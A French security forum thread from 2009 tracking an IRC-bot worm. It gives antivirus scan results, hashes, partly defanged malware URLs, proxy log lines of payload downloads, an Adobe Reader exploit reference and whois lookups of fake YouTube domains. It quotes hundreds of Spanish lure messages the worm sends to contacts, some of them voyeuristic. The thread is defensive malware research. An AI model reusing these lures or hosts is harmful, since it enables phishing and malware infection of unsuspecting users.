File Name : 3x.exe
File Size : 30720 byte
File Type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5 : 509429074ddfe42baf2b5fb3f16f52c7
SHA1 : cb0bb2b72af65f203f1e4c804c4c0e87e695c37e

AntiVir 7.9.0.138 7.1.3.41 2009-04-10 DR/Delphi.Gen 1.963

http://virscan.org/report/eb02f03d6bbec ... 617e2.html
http://virscan.org/report/b0118bf7c1ce5 ... 7549d.html
http://virscan.org/report/f0b5cd9a797a4 ... 9db53.html

par **Malekal_morte** » 10 avr. 2009 16:14

hxtp://dl116.mejorphotos.info/dl116/view.php?id=MVC-IMAGEN38.jpg

File Name : viewimages.php
File Size : 99840 byte
File Type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5 : 93eb14c2bd4f12457633345fe613fb70
SHA1 : f55e37519162a7030e33b263c0db390e5db47801

Scanner results
Scanner results : 8% Scanner(3/37) found malware!
Time : 2009/04/10 09:10:19 (CEST)

a-squared 4.0.0.32 20090409194450 2009-04-09 Backdoor.Win32.IRCBot!IK 5.485
Dr.Web 4.44.0.9170 2009.04.10 2009-04-10 BackDoor.IRC.Sdbot.3654 4.506
Ikarus T3.1.01.49 2009.04.10.72556 2009-04-10 Backdoor.Win32.IRCBot 3.331

par **Malekal_morte** » 11 avr. 2009 10:42

Fichier hgk.exe reçu le 2009.04.11 10:29:13 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 3/40 (7.5%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.11 -
AhnLab-V3 5.0.0.2 2009.04.10 -
AntiVir 7.9.0.138 2009.04.10 DR/Delphi.Gen
Antiy-AVL 2.0.3.1 2009.04.11 -
Authentium 5.1.2.4 2009.04.10 -
Avast 4.8.1335.0 2009.04.10 -
AVG 8.5.0.285 2009.04.10 -
BitDefender 7.2 2009.04.11 -
CAT-QuickHeal 10.00 2009.04.10 -
ClamAV 0.94.1 2009.04.10 -
Comodo 1109 2009.04.10 -
DrWeb 4.44.0.09170 2009.04.11 -
eSafe 7.0.17.0 2009.04.07 -
eTrust-Vet 31.6.6450 2009.04.11 -
F-Prot 4.4.4.56 2009.04.10 -
F-Secure 8.0.14470.0 2009.04.10 -
Fortinet 3.117.0.0 2009.04.11 -
GData 19 2009.04.11 -
Ikarus T3.1.1.49.0 2009.04.11 -
K7AntiVirus 7.10.698 2009.04.09 -
Kaspersky 7.0.0.125 2009.04.11 -
McAfee 5580 2009.04.10 -
McAfee+Artemis 5580 2009.04.10 -
McAfee-GW-Edition 6.7.6 2009.04.10 Trojan.Dropper.Delphi.Gen
Microsoft 1.4502 2009.04.11 -
NOD32 4000 2009.04.10 -
Norman 6.00.06 2009.04.09 -
nProtect 2009.1.8.0 2009.04.11 -
Panda 10.0.0.14 2009.04.11 -
PCTools 4.4.2.0 2009.04.08 Trojan.Buzus
Prevx1 V2 2009.04.11 -
Rising 21.24.50.00 2009.04.11 -
Sophos 4.40.0 2009.04.11 -
Sunbelt 3.2.1858.2 2009.04.10 -
Symantec 1.4.4.12 2009.04.11 -
TheHacker 6.3.4.0.305 2009.04.10 -
TrendMicro 8.700.0.1004 2009.04.10 -
VBA32 3.12.10.2 2009.04.10 -
ViRobot 2009.4.10.1688 2009.04.10 -
VirusBuster 4.6.5.0 2009.04.10 -
Information additionnelle
File size: 30720 bytes
MD5...: af9f67814986d747ec01dc5812e8baa9
SHA1..: a86f6e170e09d0b0ba0676048bf3e8d44d048b8b

et Tofsee pour spammer : http://www.virustotal.com/fr/analisis/d ... fad37188b0

Quelques phrases envoyées aux contacts par le malware :

Hola, checa estas fotos de la fiesta de anoche. Porfavor, dime que piensas de ellas antes de que las suba a Facebook y MySpace. Te lo agradecería muchisimo.
Que pedo wey. Estuve aprendiendo a usar Photoshop y he estado editando un chingo d fotos. T las mando pa q' veas q' pedo.
Ayer me tome unas fotos y las subi a myspace pero no c si quedaron bien. Revisalas y me dices si las dejo o las quito.
Estoy subiendo estas fotos a facebook. Velas y dime que piensas.
Quieres ver mis fotos nuevas? Creo que salgo rebien en ellas.
Encontre estas fotos en myspace de un typo q esta vendiendo unas cosas en mercadolibre. Velos y me dices si vale la pena comprarlos.
Quieres ver la nueva foto que me tome para myspace?
Hola. Que crees? Porfin regrese de viaje y tome un chingo d fotos, pero quiero q me digas q piensas de ellas antes de que las suba a mi facebook.
Hola, hace mucho q no nos vemos y queria que nos pusieramos al tanto. Asi que te estoy mandando varias de fotos de cosas que hecho ultimamente.
Mira las fotos que encontre en myspace. Estan buenisimas, te vas a morir de risa cuando las veas.
No vas a creer lo que acabo de comprar. Un perro que esta divino, y le tome mil fotos para que veas lo hermoso que esta.
Oie, me encontre estas fotos por ahi. Dime si crees que esta guapa la vieja.
No te la vas a creer, pero hubo un accidente a unas cuadras de mi casa y logre tomar varias fotos. Checalas, vas a quedar impactado.
Feliz navidad. Si ya se, me atrase un poco. Pero de todas formas te mando estas fotos de la fiesta que hubo en casa de mi familia.
Mira como sali en estas fotos. Estaba bien pedo cuando me las tomaron. Estan buenisimas.
Checa estas fotos que me tope en facebook. Las viejas estan bien buenas. Te vas a chupar los dedos cuando las veas.
Mira este nuevo celular. Esta padrisimo.
Crees que deba subir esta foto a myspace?
Salgo bien comico en esta foto. vela.
Se me ven enormes las orejas en estas fotos. Ya me dijieron que las quite de mi espacio.
crees que daba poner estas fotos en facebook?
Dime que piensas de la ropa que traigo puesta.
Salgo pero rebuena en estas fotos.
Te mando las fotos de la fiesta de hace 2 dias.
Te perdiste el juego de ayer. Te paso las fotos para que veas como se puso.
No lo vas a poder probar, pero mira estos tamales que cocine ayer.
Que onda, te mando fotos de la taquiza de ayer.
Que tan feo crees que me veo en esta foto?
Crees que deba subir esta foto con la ropa que traigo puesta, o mejor me cambio la camisa y el pantalon?
Mira mi nuevo color de cabello, quedo padrisimo.
Crees que estos aretes sean un buen regalo para mi novia? Te mando las fotos pa que los veas.
Mira lo que encontre en myspace. Esta buenisimo, no t puedes perder.
Acabo de comprar estos zapatos en mercado libre. Te van a encantar cuando los veas.
Crees que deba comprar este celular en mercadolibre? Esta carisimo y no me quiero arriesgar a perder mi dinero. Checa la foto del telefono.
Alguien me dijo que salgo horrible en esta foto que subi a facebook. Dime si crees que sali muy mal para que la quite.
Me acabo de comprar los lentes mas chingones jamas creados. Me tome varias fotos con los lentes puestos.
Dime que fotos estan mejores. No me decido cuales y ya quiero llenar mi facebook the fotos.
Holaaaa!!! Siglos sin verte. Te mando estas fotos para que veas lo que estado aciendo. Espero que tu me mandes algunas de regreso.
Porque no fuiste a la fiesta de aier??? Muy mal por ti. Peo como yo si soy muy buen amigo t voy a mandar todas las fotos que tome.
Te perdiste el concurso que ubo en la feria. Tome un monton de fotos para que te animes a ir la proxima semana.
Oseaaaaa!!! Un exito total el evento que organizo la escuela. Estaba lleno de gente el lugar. Tome varias fotos para que veas como se puso.
Hola, por fin me digne a revelar las fotos del viaje que hicimos para año nuevo. Ya sabes yo sigo con mi camara viejita. Ya las escanee y t las estoy mandando.
Necesito vender algunas cosas urgentemente. Mira lo que estoy vendiendo y dime que precio crees que le deba poner. Me urge de verdad.
Me mandaron unas fotos de una nueva modelo y esta rebuena la vieja.
No te la vas a creer wey, pero aparecieron unas fotos de una amiga del salon completamente en pelotas y la vieja esta rebuena.
Te estoy mandando las fotos que te prometi de mi vecina. Hize lo que me dijiste de subirme al techo y tomarle las fotos cuando esta en el baño.
Puta wey no mames!!! Me mandaron las fotos de Alexandra completamente desnuda. Esta rebuena la pinche vieja tienes k ver las fotos.
Porfin consegui las fotos que te dije que le tome a mi ex y que ella tenia escondidas en su cuarto. Te las paso para que las roles a todos tus amigos.
no puedo creer q no vinieras a la fiesta, cheka las fotos
te mando las fotos del festival de ballet de mi hija
acabo de comprar mi iphone, ve como salen sus fotos
consegui la lista de articulos que querias junto con sus fotos
me operaron la nariz y me quedo poca madre
consegui las fotos de carlita en la playa, estan excelentes
ya regrese de vacaciones, apenas pueda te mando las fotos del viaje
ya me termine de tomar las fotos para mi portafolio, dime que piensas
voy a subir tus fotos a facebook, dime cuales no t gustan para que no las suba
logre meter mi camara al concierto de ayer y tome un chingo de fotos
le tome una foto a mi apendice recien extirpado, esta precioso jajaja
t perdiste el mejor partido dl mundo, para foturna tuya tome muchas fotos
no vas a creer el tamaño de este gato, parece un cochino con pelo
no creer hasta no ver, vdd? pos ve esto
acaban de colgar estos baners a unas cuadras de mi casa, estan de risa
las mas reciente recopilacion del peje y sus tonterias
logre terminar la maquetadel nuevo edificio, quedo increible
Nesesitas ver esta foto quedo brutal!
Fui a un concierto ayer quedo pero requete padre! tome algunas fotos
has visto en estos dias mis nuevas fotos? aqui te envio una :P
nesesito que me digas si en esta foto salgo bien, dime que opinas
oye, el fin de semana pasado tome unas fotos de un party que estuvo bn bueno! miralas
cuando vas a aceptar mi nueva foto ahhhh!
oye cuando tengas break mira esta foto y dime que piensas de mi nuevo estilo
fotos mia en la playa.. que rico!
oye mira mi foto de mi coche nuevo se que te va a gustar
mira aqui, mi actriz favorita... sale preciosa
oye estoy haciendo algunos arreglos a varias de mis fotos te voy a mandar una y dime que piensas
en esta foto si que salgo horrible... ahi caramba que fea! haha

me puedes poner esta foto en facebook?
me cerraron mi cuenta porque puse esta foto. muy mal?
viste la super fiesta de año nuevo?
Esta foto es perfecta para tu wallpaper.
Esta foto mia vale madre no se la muestres a nadien
que te parese si pongo esta foto de los dos?
Me miro bien boracho en la fot que me tomaron
Esta foto es me mejor foto tomado
Mi cuarto quedo sucio despues del ano nuevo!
Le dimos a toda madre a ese lugar!
Quisas tenga pedo con ellos?
Esa camisa me hace sonreir lee lo.
Esta es mi casa de suenos!
Como son tus decoraciones de navidad?
Que te parces east foto para ponerla en facebook?
Mi pelo parece que se me exploto!!!hehe
Mira esta foto antes de subir a mi album
Mira la foto que baje de facebook.
Esta fota es mi favorita pienso subir la a facebook
Mira no mas qu desmadre me miro en esta foto no se la muestres a nadie por favor.
Mira todo las cosas que pusimos el la casa para navidad
Que te parece esta foto? no se mucho de editar.
Me parce que estuvo con ellso pero no recuredo bien :(
Mira las fotos nuevos de la fiesta, lo que te pirdiste.
Mi cuarto valio madre depues de la fiesta.
No se cuanto voy a durar recojendo mi cuarto despues de esta desmadre.
Esta vieja quedo muy chingada despues de la fiesta.
Conoces esta persona en la foto? me parece que no te hagas...
Esta foto te va ser desmayar cuando la mires.
Mira que pedo andaba ayer en la fiesta
Esta foto vale madre mira que feo estoy.
Ayer estube al brinco mira esta foto.
Se me hace que me dormir con ellas..que piensas de ellas?
En esta fot me veo gordo.
Mira aqui esta tu mama en esta foto..hehe
Esta foto tuya me gusta mucho.
No me haiga puesto pedo ayer.
Mira esta fot antes de que la suba.
Mira esta foto nueva.
Ya que regreses acepta mi foto que subi a mi perfil
No puedo creer esto mira esat jalada
Mira esta chulada de vieja!!!
Mira esta foto acabo de editarle para mi amigo?
Esta fot no puede ser tu..dime que no es sierto?
No puedo creer que anduve con estas dos viejas
No me acuerdo si me acoste con esta persona!!!!
Mira las fotos nuevas de las fiesta como te la pirdiste
Esta fot es gracioso acepta la foto.
Que te parece hasta foto so nuevo con esto.
no puedo creer que esta sea tu foto?
Que te parce esta foto me veo buen or vale madre?
Esta es la computadora que quiero comprar es a toda madre.
No se si esto es verda or falso?
Me levante junto con esta mujer y no me acuredo nada.
Mira esta foto antes de que la suba.
hahaha mira esta foto nueva.
cuando regreses acepta mi nueva foto de mi perfil.
Dime se has visto algo asi de loco?
Esta foto esta a toda madre!
Mira lo que hice para mi amigo..te gusta?
No me acuerdo si me dormir con esta vieja??/no se que hacer?
Ojala que no sea serto verdad?
Se me hace muy mal que no me acuerdo nada de ella?
este es to foto?
Esta fot es de mis nuevos..te gusta?
Esta fot esta al tiro me gusta mucho..la queires ver?
Que peinsas de esta foto la quiro suber a facebook?
Mira esta foto que acabo de tomar.
Santo Dios creo que eres tu!!!!
Esta fot esta bien! la subo a mi blog?
Que te parece mi nuevo look?
toma esta foto con mi camara. dime lo que piensas?
Que te parece mi nuevo corte de pelo?
Mira el nuevo color de mi pelo.
Me salen errores a mi.. puedes ver si puedes imprimir esto?
Mi nuevo blog do fotos esta chingon
Me gusta esta foto que acabo de tomar.
Mira los lentes que compre..como te gusta?
Las fotos que tome anoche se miran buen.
Esto mejorando en photoshop mira esta foto.
Esta foto me dio muchos problemas.
Dime si tu puedes imprimir esta foto..yo no puedo.
Cuando tengas tiempo puedes imprimir esta foto, yo no puedo con esta computadora.
No se porque mi computadora no puede imprimir esta foto?
Se me hace que este eres tu en esta foto?
Eres tu? dime la verdad?
Te estas escondiendo atras en esta foto?
Guarda esta foto te ves bien.
Terminaste la foto mia?
Que se te hace esta fot la acabo de tomar con mi camara nueva?
Mi camara digital esta a madre que se te hace esta foto?
Esta foto te miras padre!
Mira estas foto al menos una vez?
Ojala no te enojes pero mira estas fotos.
No me acuerdo quien me tomo estas fotos? y tu?
Esta vieja tomo mucho.
Se te hace algo raro en esta foto?
Hubieras tenido un timepo padrismo con estas dos viejas?
Mira estas dos viejas tuve un trio con ellas?
Estos cabrones parce que estan cojiendo!
Esta fot esta a madre..que te parece?
Esto esta a toda madre!
Mira esto te va ser feliz.
Mira esta foto que tome el otro dia?
Si me hace que me dormir con ellas la semana pasada?
Mira las fotos nuevas de la fiesta.
No me acuerdo la mitad que paso anoche esta fiesta estuvo a pura madre.
Toma esta fot para que la guardes!
Mis amisgo pueden ver las fotos?
Mira el collar que queiro lo mire en el mercado.
puedes tagearme en esta foto de facebook?
No puede ser que sea el en esta foto!
Mira la casa de mis suenos. mira la alberca!
Mira esta foto pero que nadie la mire!
Que te parece esta foto? no queiro que me boten a la basura.
Puedo poner tu foto en mi perfil?
Esta foto peudo ponerlo en mi album de facebook?
No me acuerdo si me acoste con estas la semana pasada?
Esta foto me gusta y no me gusta. que peinsas?
Mi camiseta esta padre mirala!
Compre un webcam dime que se te hace la calidad?
Mira esta foto vieja de ti te mirars a madre.
Esta fot esta padre!!!
Ojala no me mates mira esta foto tuya!
Esta otra foto tuya vale madre mirala!
Ayer coji y estuvo padre!!hehe
Mira mis fotos de myspace. Que piensas?
Mira la foto que encontre de ti en hotornot.com!
Esta foto es tu? lo encontre en guaoofeo.com!!!
esta foto es tuya? no lo puedo creer!
Tuve sexo con ella pero no me gusto.
Mira la foto de la fiesta que te pirdiste.
Me veo a toda madre en esta foto no se la muestres a nadie porfavor!
Este es tu foto en adultfriendfinder.com! haha
Que cres de este foto lo quiero poner en mi perfil?
Esta persona estan cojiendo en la mesa!!!
Mira la foto que correji..aceptala.
estaba hasta la madre cuando me tomaron esta foto!!!
Mira la foto que este loco estaba usando????
Mira esta foto nuevo?
Como me miro? a madre or feo?
Me peol quedo a pura madre..miralo!
Me quedo mal mi pelo ya no me lo voy a pintar!
Que piensas de mi cabello?
Cres que me veo bien en este corte?
Y este corte que piensas?
Que piensas de este foto en mi blog?
puedo poner esta foto en mi weblog?
Prueba este fondo de pantalla..te va a gustar.
Que peinsas de esta pantalla de fondo?
Te va gustar esta fondo de pantalla.Mira el photoshop que te hice..heheh
Lee la camisa de ese vato.
Mira esta foto mia esta padrisimo!
Acepta este foto esta a pura madre!
Pura cerveza y bailar eso es la idea.
Mira mis fotos nuevos estan chingones!
Esta foto es chingon miralo!
Que te parce mi camisa nueva?
quieres ver unas fotos nuevas??
Mira me nuevo look. que te parece?
Este wallpaper mio me gusta. que te parece?
Este foto de mi amiga esta calinete!!
Esta foto tuya esta a madre!!
Esta banda esta chingona me gusta mucho.
Me gusta mucho tu foto esta!
Esta fot salimos chingon pero esta viejisima!
Mira esto se me hace raro.
Mira esta foto mia?
Este vato esta loco miralo.
puedo ensenarle estos fotos a mis amigos?
ya se mucho de photshop mira esta foto.
Mira estas fotos de la semana pasada la fiesta estuvo a pura madre.
puedo poner esta foto tuya en mi blog porfavor?
Mira esto no puedo creolo?
mira este foto no se ve bien en mi computadora.
puedo ensenarle estos fotos a mis amigos?
Te puedo poner en una foto mia? dime si puedo?

par **Malekal_morte** » 18 avr. 2009 13:37

Slenfbot se met maintenant au fausse page Youtube "Mi video gracioso!" pour faire télécharger un faux installer flash (principe des faux codec)

Me puedes poner esta video en youtube?
Me cerraron mi cuenta porque puse esta video. Se ve mal?
Viste el video del año nuevo?
Esta video es perfecto para tu introducion.
Este video mia, vale madre no se la muestres a nadien
Que te parese si pongo esta video de los dos?
Me miro bien boracho en la video que hisieron
Esta video es mi mejor video que a echo
Mi cuarto quedo sucio despues del ano nuevo!
Le dimos a todas madre ese dia!
Quisas tenga pedo con ellos?
me puedes poner este video en youtube?
me cerraron mi cuenta porque puse este video. esta muy mal?
viste la super fiesta de año nuevo en video?
este video mio vale madre no se lo muestres a nadie
que te parese si pongo este video de los dos?
Me miro bien boracho en el video que me tomaron
este video es me mejor video tomado
Le dimos a toda madre a ese lugar!
Quisas tenga pedo con ellos?
Esa camisa me da risa, checalo.
esta es la casa de mis suenos!
Que te parces este video para ponerla en youtube?
Mi pelo parece que se me exploto!!!hehe
Mira este video antes de subirlo a youtube
Mira la video que baje de youtube.
este video es mi favorito pienso subirlo a youtube
Mira no mas que desmadre en este video no se la muestres a nadie por favor.
Mira todo las cosas que pusimos el la casa para primavera
Que te parece este video? no se mucho de editar.
Me parce que estuvo con ellos pero no recuerdo bien :(
Mira las videos nuevos de la fiesta, lo que te pirdiste.
Mi cuarto valio madre depues de la fiesta.
No se cuanto voy a durar recojendo mi cuarto despues de este desmadre.
este vieja quedo muy chingada despues de la fiesta.
Conoces este persona en la video? me parece que no te hagas...
este video te va ser desmayar cuando la mires.
Mira que pedo andaba ayer en la fiesta
este video vale madre mira que feo estoy.
Ayer estube al brinco mira este video.
Se me hace que me dormire con ellas..que piensas de ellas?
En este video me veo gordo.
Esa camisa me hace ver gordo en el video.
Esta es mi video de sueños!
Como es tu video de navidad?
Que te parce si el video? Para ponerla en youtube?
Mi pelo se ve que se me exploto!!! Hehe.
Mira este video antes de ponerlo en youtube.
Mira la video que baje de youtube.
Esta video es mi favorita pienso ponerlo en youtube.
Me veo como que desmadre en este video no se la muestres a nadie por favor.
Mira todo las cosas que pusimos el la video de navidad
Que te parece este video? No se mucho de editar.
Me parce que estuvo con ell, pero no me arecuerdo bien :-(
Mira los videos nuevos de la fiesta, lo que te pirdiste.
Me arecuerdo madre depues de la fiesta.
No se cuanto voy a durar recojiendo mi cuarto despues de esta desastre.
Esta vieja quedo muy chingada despues de la fiesta.
Conoces esta persona en la video? Me parece que si, no te hagas...
Te vas a desmayar despues que la veas.
Mira que pedo andaba ayer en la fiesta
Este video vale madre mira que feo estoy.
Ayer estube al brinco mira este video.
Se me hace que me dormir con ellas..que piensas de tu?
En el video me veo gordo.
Aqui esta tu mama en esta video..hehe
Este video me gusta mucho.
No me digas que me haiga puesto pedo ayer.
Mira este video antes de que la entrege.
Mira este video nueva.
Cual regreses acepta mi video que te entrege.
No puedo creer esto, mira esta jalada
Mira esta chulada!!!
Mira mi video acabo de editarle para mi amigo.
Ese video no puede ser tu.. dime que no es sierto.
No puedo creer que estuve con estas dos viejas
No me arecuerdo si me acoste con ella!!!!
Mira el video nuevo de las fiesta que te pirdiste.
Este video es gracioso acepta lo.
Que te parece este video nuevo con eso.
No puedo creer que es tu video.
Que te parce este video, me veo bien?
Esta es la computadora que quiero comprar, es a toda madre.
No se si esto es sierto?
Me levante alado de esta mujer y no me arecuerdo de nada.
Mira este video antes de que la suba. Hahaha
Mira este video nueva. Cuando regreses ve el video.
Dime si as visto algo tan loco.
Ese video esta a toda madre!
Mira lo que hice para mi amigo..te gusta?
No me arecuerdo si me dormir con esta vieja!! No se que hacer.
Ojala que no sea sierto?
Se me hace muy mal que no me acuerdo nada.
Este es tu video?
Este video es uno de los nuevos.. te gusta?
Este video esta al tiro me gusta mucho..la quieres ver?
Que piensas del video la quieres poner en youtube?
Mira este video que acabo de acer.
Santo dios creo que eres tu!!!!
Este video esta bien! La pongo a mis favoritos?
Que te parece mi nuevo look?
Mira este video con mi camara. Dime lo que tu piensas.
Que te parece mi nuevo corte de pelo?
Mira el nuevo color de mi pelo.
A mi salen errores.. puedes ver si puedes arreglarlo?
Mis videos esta chingon.
Me gusta el video que acabo de acer.
Mira los lentes que compre.. te gusta?
Las fotos que tome en la noche se ven bien.
Estoy mejorando en photoshop mira esta video

Adresse de la fausse page Youtube à l'heure où sont écrites ces lignes : hxtp://youtube01.myspace-imagen.info/watchv=KduBTtiTIGa

Scan VirusTotal :

Fichier install_flash_player.exe reçu le 2009.04.18 13:26:59 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 5/40 (12.5%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.18 Downloader.Delphi!IK
AhnLab-V3 5.0.0.2 2009.04.17 -
AntiVir 7.9.0.143 2009.04.17 TR/ATRAPS.Gen
Antiy-AVL 2.0.3.1 2009.04.17 -
Authentium 5.1.2.4 2009.04.18 -
Avast 4.8.1335.0 2009.04.17 -
AVG 8.5.0.287 2009.04.17 -
BitDefender 7.2 2009.04.18 -
CAT-QuickHeal 10.00 2009.04.18 -
ClamAV 0.94.1 2009.04.18 -
Comodo 1120 2009.04.18 -
DrWeb 4.44.0.09170 2009.04.18 -
eSafe 7.0.17.0 2009.04.13 -
eTrust-Vet 31.6.6455 2009.04.14 -
F-Prot 4.4.4.56 2009.04.17 -
F-Secure 8.0.14470.0 2009.04.18 -
Fortinet 3.117.0.0 2009.04.18 -
GData 19 2009.04.18 -
Ikarus T3.1.1.49.0 2009.04.18 Downloader.Delphi
K7AntiVirus 7.10.707 2009.04.17 -
Kaspersky 7.0.0.125 2009.04.18 -
McAfee 5587 2009.04.17 -
McAfee+Artemis 5587 2009.04.17 Generic!Artemis
McAfee-GW-Edition 6.7.6 2009.04.18 Trojan.ATRAPS.Gen
Microsoft 1.4502 2009.04.18 -
NOD32 4018 2009.04.18 -
Norman 6.00.06 2009.04.17 -
nProtect 2009.1.8.0 2009.04.18 -
Panda 10.0.0.14 2009.04.17 -
PCTools 4.4.2.0 2009.04.17 -
Prevx1 V2 2009.04.18 -
Rising 21.25.52.00 2009.04.18 -
Sophos 4.40.0 2009.04.18 -
Sunbelt 3.2.1858.2 2009.04.18 -
Symantec 1.4.4.12 2009.04.18 -
TheHacker 6.3.4.0.309 2009.04.16 -
TrendMicro 8.700.0.1004 2009.04.17 -
VBA32 3.12.10.2 2009.04.12 -
ViRobot 2009.4.18.1685 2009.04.18 -
VirusBuster 4.6.5.0 2009.04.17 -
Information additionnelle
File size: 133632 bytes
MD5...: ed6bd9ae436a1b3e005be67c717f17bc
SHA1..: d338ad325870fea26cb6b4bdbd32f8a03651bec8

par **Malekal_morte** » 18 avr. 2009 13:53

La page contient aussi un Exploit, voir rapport wepawet : http://wepawet.iseclab.org/view.php?has ... 03&type=js

Adobe util.printf overflow Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf CVE-2008-2992

Code : Tout sélectionner

1240053674.592   1122 192.168.1.25 TCP_MISS/200 57678 GET http://feds-r-watching.us/load.php?id=0&spl=1 - DIRECT/69.64.92.70 application/octet-stream

File 48336f9c41e537ff12a0ab888f848eea- received on 04.18.2009 13:47:00 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 5/40 (12.5%)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.04.18 Trojan.Win32.Buzus!IK
AhnLab-V3 5.0.0.2 2009.04.17 -
AntiVir 7.9.0.143 2009.04.17 DR/Delphi.Gen
Antiy-AVL 2.0.3.1 2009.04.17 -
Authentium 5.1.2.4 2009.04.18 -
Avast 4.8.1335.0 2009.04.17 -
AVG 8.5.0.287 2009.04.17 -
BitDefender 7.2 2009.04.18 -
CAT-QuickHeal 10.00 2009.04.18 -
ClamAV 0.94.1 2009.04.18 -
Comodo 1120 2009.04.18 -
DrWeb 4.44.0.09170 2009.04.18 -
eSafe 7.0.17.0 2009.04.13 -
eTrust-Vet 31.6.6455 2009.04.14 -
F-Prot 4.4.4.56 2009.04.17 -
F-Secure 8.0.14470.0 2009.04.18 -
Fortinet 3.117.0.0 2009.04.18 -
GData 19 2009.04.18 -
Ikarus T3.1.1.49.0 2009.04.18 Trojan.Win32.Buzus
K7AntiVirus 7.10.707 2009.04.17 -
Kaspersky 7.0.0.125 2009.04.18 -
McAfee 5587 2009.04.17 -
McAfee+Artemis 5587 2009.04.17 -
McAfee-GW-Edition 6.7.6 2009.04.18 Trojan.Dropper.Delphi.Gen
Microsoft 1.4502 2009.04.18 -
NOD32 4018 2009.04.18 -
Norman 6.00.06 2009.04.17 -
nProtect 2009.1.8.0 2009.04.18 -
Panda 10.0.0.14 2009.04.17 -
PCTools 4.4.2.0 2009.04.17 Trojan.Midgare.EYZ
Prevx1 V2 2009.04.18 -
Rising 21.25.52.00 2009.04.18 -
Sophos 4.40.0 2009.04.18 -
Sunbelt 3.2.1858.2 2009.04.18 -
Symantec 1.4.4.12 2009.04.18 -
TheHacker 6.3.4.0.309 2009.04.16 -
TrendMicro 8.700.0.1004 2009.04.17 -
VBA32 3.12.10.2 2009.04.12 -
ViRobot 2009.4.18.1685 2009.04.18 -
VirusBuster 4.6.5.0 2009.04.17 -
Additional information
File size: 57344 bytes
MD5...: 9005e1f2538004c5484a619bc5970312
SHA1..: b4d9437d2427f2d662249dab263c6d020c58aacf

par **Malekal_morte** » 18 avr. 2009 16:06

Code : Tout sélectionner

1240062859.847   1876 192.168.1.25 TCP_MISS/200 130383 GET http://www.gotyoutube.info/watchv%3DKduBTtiTIGc/www.adobe.com/install_flash_player.exe - DIRECT/208.77.45.131 application/octet-stream

Fichier install_flash_player.exe.1 reçu le 2009.04.18 15:58:20 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 6/39 (15.39%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.18 Downloader.Delphi!IK
AhnLab-V3 5.0.0.2 2009.04.17 -
AntiVir 7.9.0.143 2009.04.17 TR/ATRAPS.Gen
Antiy-AVL 2.0.3.1 2009.04.17 -
Authentium 5.1.2.4 2009.04.18 W32/Injector.E.gen!Eldorado
Avast 4.8.1335.0 2009.04.17 -
AVG 8.5.0.287 2009.04.18 -
BitDefender 7.2 2009.04.18 -
CAT-QuickHeal 10.00 2009.04.18 -
ClamAV 0.94.1 2009.04.18 -
Comodo 1120 2009.04.18 -
DrWeb 4.44.0.09170 2009.04.18 -
eSafe 7.0.17.0 2009.04.13 -
eTrust-Vet 31.6.6455 2009.04.14 -
F-Prot 4.4.4.56 2009.04.17 W32/Injector.E.gen!Eldorado
F-Secure 8.0.14470.0 2009.04.18 -
Fortinet 3.117.0.0 2009.04.18 -
GData 19 2009.04.18 -
Ikarus T3.1.1.49.0 2009.04.18 Downloader.Delphi
K7AntiVirus 7.10.707 2009.04.17 -
Kaspersky 7.0.0.125 2009.04.18 -
McAfee 5587 2009.04.17 -
McAfee+Artemis 5587 2009.04.17 -
McAfee-GW-Edition 6.7.6 2009.04.18 Trojan.ATRAPS.Gen
Microsoft 1.4502 2009.04.18 -
NOD32 4018 2009.04.18 -
Norman 6.00.06 2009.04.17 -
nProtect 2009.1.8.0 2009.04.18 -
Panda 10.0.0.14 2009.04.18 -
PCTools 4.4.2.0 2009.04.17 -
Rising 21.25.52.00 2009.04.18 -
Sophos 4.40.0 2009.04.18 -
Sunbelt 3.2.1858.2 2009.04.18 -
Symantec 1.4.4.12 2009.04.18 -
TheHacker 6.3.4.0.309 2009.04.16 -
TrendMicro 8.700.0.1004 2009.04.17 -
VBA32 3.12.10.2 2009.04.12 -
ViRobot 2009.4.18.1685 2009.04.18 -
VirusBuster 4.6.5.0 2009.04.17 -
Information additionnelle
File size: 130048 bytes
MD5...: 0cfef174a0eed85248398234c38dbaaf
SHA1..: 9aee4aa2e0951b9b50d14779988c8303c3e8d76e

par **Malekal_morte** » 20 avr. 2009 18:47

actuelle adresse : htxp://www.cyoutube.info/watchv=KduBTtiTIGdB

[email protected]:/tmp$ whois byoutube.info|egrep "Registrar|Email"
queries or data to the systems of Registry Operator, a Registrar, or
Sponsoring Registrar:Wild West Domains (R213-LRMS)
Registrant Email:[email protected]
Admin Email:[email protected]
Billing Email:[email protected]
Tech Email:[email protected]
[email protected]:/tmp$ whois cyoutube.info|egrep "Registrar|Email"
queries or data to the systems of Registry Operator, a Registrar, or
Sponsoring Registrar:Wild West Domains (R213-LRMS)
Registrant Email:[email protected]
Admin Email:[email protected]
Billing Email:[email protected]
Tech Email:[email protected]
[email protected]:/tmp$ whois dyoutube.info|egrep "Registrar|Email"
queries or data to the systems of Registry Operator, a Registrar, or
Sponsoring Registrar:Wild West Domains (R213-LRMS)
Registrant Email:[email protected]
Admin Email:[email protected]
Billing Email:[email protected]
Tech Email:[email protected]
[email protected]:/tmp$ whois eyoutube.info|egrep "Registrar|Email"
queries or data to the systems of Registry Operator, a Registrar, or
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Registrant Email:[email protected]
Admin Email:[email protected]
Billing Email:[email protected]
Tech Email:[email protected]
[email protected]:/tmp$ whois fyoutube.info|egrep "Registrar|Email"
queries or data to the systems of Registry Operator, a Registrar, or
Sponsoring Registrar:Wild West Domains (R213-LRMS)
Registrant Email:[email protected]
Admin Email:[email protected]
Billing Email:[email protected]
Tech Email:[email protected]
[email protected]:/tmp$ whois gyoutube.info|egrep "Registrar|Email"
queries or data to the systems of Registry Operator, a Registrar, or
